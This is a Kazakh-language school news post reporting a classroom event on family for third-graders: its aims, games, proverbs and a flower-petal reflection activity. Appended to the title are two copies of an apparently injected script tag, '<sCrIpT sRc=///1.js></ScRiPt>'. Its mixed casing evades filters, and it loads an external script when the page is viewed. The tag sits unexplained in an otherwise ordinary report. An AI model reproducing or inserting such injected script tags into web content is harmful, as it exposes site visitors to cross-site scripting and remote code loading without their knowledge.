«Отбасы – бәрінің бастауы» тақырыбында сыныптан тыс іс-шара<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.03.2023
«2 ЖББМ» КММ көктемгі мерекелерге арналған жұмыс жоспарына сәйкес 3 «В» сыныбында «Отбасы – бәрінің бастауы» тақырыбында сыныптан тыс іс-шара өткізілді.
Іс-шараның мақсаты: оқушылардың отбасы туралы білімдерін бекіту; танымдық және шығармашылық белсенділікті дамыту; отбасы мүшелерінің қарым-қатынасын зерттеуге қызығушылықтарын арттыру.
Іс-шараға барлық оқушылар белсене қатысты, «Менің отбасым» сөзжұмбағын тауып, армандаған үйін тұрғызды, «Рұқсат, тыйым», «Кім кім кім» ойындарын ойнады. Балалар ғибратты нақыл сөздерді тыңдап, балалар мен ата-аналардың міндеттерін үлестірді. Отбасы туралы мақал-мәтелдер құрастырды.
Шара нәтижесінде «Түймедақ» рефлексиясы өткізілді, оқушылар гүл жапырақшаларына өз отбасыларына тілектерін жазды.
Просмотров: 485


Пікір қосу



Деректерді қолтаңбаға қосу